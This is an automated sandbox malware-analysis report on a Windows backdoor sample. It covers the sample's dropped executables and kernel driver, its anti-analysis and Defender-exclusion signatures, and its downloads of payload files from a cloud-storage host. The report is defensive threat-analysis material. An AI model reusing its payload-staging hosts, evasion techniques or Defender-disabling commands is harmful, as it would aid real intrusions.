Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
149876985-734579485.05.exe

Overview

General Information

Sample name:149876985-734579485.05.exe
Analysis ID:1590025
MD5:d21ced168a5267499378453eee404703
SHA1:29ac1c528970d1e2423deb11b5998a2eb7c0842b
SHA256:419fbd9b877c7d0c7f9874b5a87b8f446fe599608731ac5b447acc74315e6a67
Tags:backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sample is not signed and drops a device driver
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Yara signature match

Classification

  • System is w10x64
  • 149876985-734579485.05.exe (PID: 6452 cmdline: "C:\Users\user\Desktop\149876985-734579485.05.exe" MD5: D21CED168A5267499378453EEE404703)
  • S1JCyi.exe (PID: 2424 cmdline: C:\Users\user\Documents\S1JCyi.exe "?Y5?( MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • S1JCyi.exe (PID: 1716 cmdline: C:\Users\user\Documents\S1JCyi.exe "?Y5?( MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • S1JCyi.exe (PID: 2380 cmdline: C:\Users\user\Documents\S1JCyi.exe "?Y5?( MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
6.2.S1JCyi.exe.28d0000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
5.2.S1JCyi.exe.2880000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
7.2.S1JCyi.exe.2730000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 149876985-734579485.05.exeVirustotal: Detection: 6%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: unknownHTTPS traffic detected: 59.110.190.21:443 -> 192.168.2.4:49902 version: TLS 1.2
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe, 00000005.00000000.2725795843.0000000140014000.00000002.00000001.01000000.00000008.sdmp, S1JCyi.exe, 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmp, S1JCyi.exe, 00000006.00000002.2745881061.0000000140014000.00000002.00000001.01000000.00000008.sdmp, S1JCyi.exe, 00000006.00000000.2735513195.0000000140014000.00000002.00000001.01000000.00000008.sdmp, S1JCyi.exe, 00000007.00000000.2845601695.0000000140014000.00000002.00000001.01000000.00000008.sdmp, S1JCyi.exe, 00000007.00000002.2946510571.0000000140014000.00000002.00000001.01000000.00000008.sdmp, S1JCyi.exe.0.dr
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_00007FFE1A48A1B8 FindFirstFileExW,5_2_00007FFE1A48A1B8
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DFFE
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DDFF
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]5_2_0000000140011270
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DE96
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DEFB
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000E178
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DDD9
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: 3MHost: khec3y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: 3MHost: khec3y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: 3MHost: khec3y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: 3MHost: khec3y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: 3MHost: khec3y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: 3MHost: khec3y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: 3MHost: khec3y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: khec3y.oss-cn-beijing.aliyuncs.com
Source: global trafficDNS traffic detected: DNS query: 22mm.oss-cn-hangzhou.aliyuncs.com
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0I
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0P
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://ocsp.thawte.com0
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.drString found in binary or memory: http://s.symcd.com06
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.drString found in binary or memory: http://s.symcd.com0_
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.drString found in binary or memory: http://s2.symcb.com0
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.drString found in binary or memory: http://sv.symcd.com0&
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.drString found in binary or memory: http://sw.symcb.com/sw.crl0
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.drString found in binary or memory: http://sw.symcd.com0
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: 149876985-734579485.05.exeString found in binary or memory: http://toro.d.dooo.jp/index.html)k0
Source: 149876985-734579485.05.exeString found in binary or memory: http://toro.d.dooo.jp/index.htmlTORO
Source: 149876985-734579485.05.exeString found in binary or memory: http://toro.d.dooo.jp/report/receive.cgi?exe=ClockPod
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 189atohci.sys.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
Source: S1JCyi.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0)
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
Source: 149876985-734579485.05.exe, 00000000.00000003.2565027405.0000000000624000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2565027405.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589723145.0000000000619000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589830190.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/
Source: 149876985-734579485.05.exe, 00000000.00000003.2565027405.0000000000624000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589723145.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-1002
Source: 149876985-734579485.05.exe, 00000000.00000003.2565027405.0000000000624000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589723145.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/7-2476756634-1002
Source: 149876985-734579485.05.exe, 00000000.00000003.2589830190.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/Jc
Source: 149876985-734579485.05.exe, 00000000.00000003.2589723145.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/a.gif
Source: 149876985-734579485.05.exe, 00000000.00000003.2565027405.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/a.gif%
Source: 149876985-734579485.05.exe, 00000000.00000003.2565027405.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/a.gifR
Source: 149876985-734579485.05.exe, 00000000.00000003.2565027405.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589723145.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/a.gifhttps://khec3y.oss-cn-beijing.aliyuncs.com/b.gifhttp
Source: 149876985-734579485.05.exe, 00000000.00000003.2565027405.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/a.gif~
Source: 149876985-734579485.05.exe, 00000000.00000003.2589723145.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/b.gif
Source: 149876985-734579485.05.exe, 00000000.00000003.2589723145.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/b.gifB
Source: 149876985-734579485.05.exe, 00000000.00000003.2589723145.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/b.gifj
Source: 149876985-734579485.05.exe, 00000000.00000003.2589723145.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/
Source: 149876985-734579485.05.exe, 00000000.00000003.2565027405.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589723145.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/c.gif
Source: 149876985-734579485.05.exe, 00000000.00000003.2565027405.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589723145.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/d.gif
Source: 149876985-734579485.05.exe, 00000000.00000003.2565027405.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589723145.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/i
Source: 149876985-734579485.05.exe, 00000000.00000003.2565027405.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589723145.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/u
Source: 189atohci.sys.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownHTTPS traffic detected: 59.110.190.21:443 -> 192.168.2.4:49902 version: TLS 1.2

System Summary

barindex
Source: 6.2.S1JCyi.exe.28d0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 5.2.S1JCyi.exe.2880000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 7.2.S1JCyi.exe.2730000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_0000000140006C95 NtAllocateVirtualMemory,5_2_0000000140006C95
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520
Source: C:\Users\user\Desktop\149876985-734579485.05.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_000000014000C3F05_2_000000014000C3F0
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_000000014000CC005_2_000000014000CC00
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_0000000140001A305_2_0000000140001A30
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_000000014000C2A05_2_000000014000C2A0
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_00000001400022C05_2_00000001400022C0
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_00000001400110F05_2_00000001400110F0
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_0000000140010CF05_2_0000000140010CF0
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_00000001400093005_2_0000000140009300
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_000000014000BB705_2_000000014000BB70
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_0000000140003F805_2_0000000140003F80
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_00000001400103D05_2_00000001400103D0
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_00007FFE1A4902485_2_00007FFE1A490248
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_00007FFE1A48A1B85_2_00007FFE1A48A1B8
Source: Joe Sandbox ViewDropped File: C:\Users\user\Documents\S1JCyi.exe D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 149876985-734579485.05.exe
Source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSa.dllp( vs 149876985-734579485.05.exe
Source: 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 149876985-734579485.05.exe
Source: 149876985-734579485.05.exe, 00000000.00000000.1691590321.0000000141D91000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCLOCKPOD64.EXE2 vs 149876985-734579485.05.exe
Source: 149876985-734579485.05.exeBinary or memory string: OriginalFilenameCLOCKPOD64.EXE2 vs 149876985-734579485.05.exe
Source: 6.2.S1JCyi.exe.28d0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 5.2.S1JCyi.exe.2880000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 7.2.S1JCyi.exe.2730000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 189atohci.sys.0.drBinary string: \Device\Driver\
Source: 189atohci.sys.0.drBinary string: \Device\TrueSight
Source: classification engineClassification label: mal80.evad.winEXE@4/12@2/1
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,5_2_0000000140003F80
Source: C:\Users\user\Documents\S1JCyi.exeCode function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,5_2_0000000140001430
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520
Source: C:\Users\user\Desktop\149876985-734579485.05.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\i[1].datJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeMutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Users\user\Documents\S1JCyi.exeMutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: 149876985-734579485.05.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\149876985-734579485.05.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 149876985-734579485.05.exeVirustotal: Detection: 6%
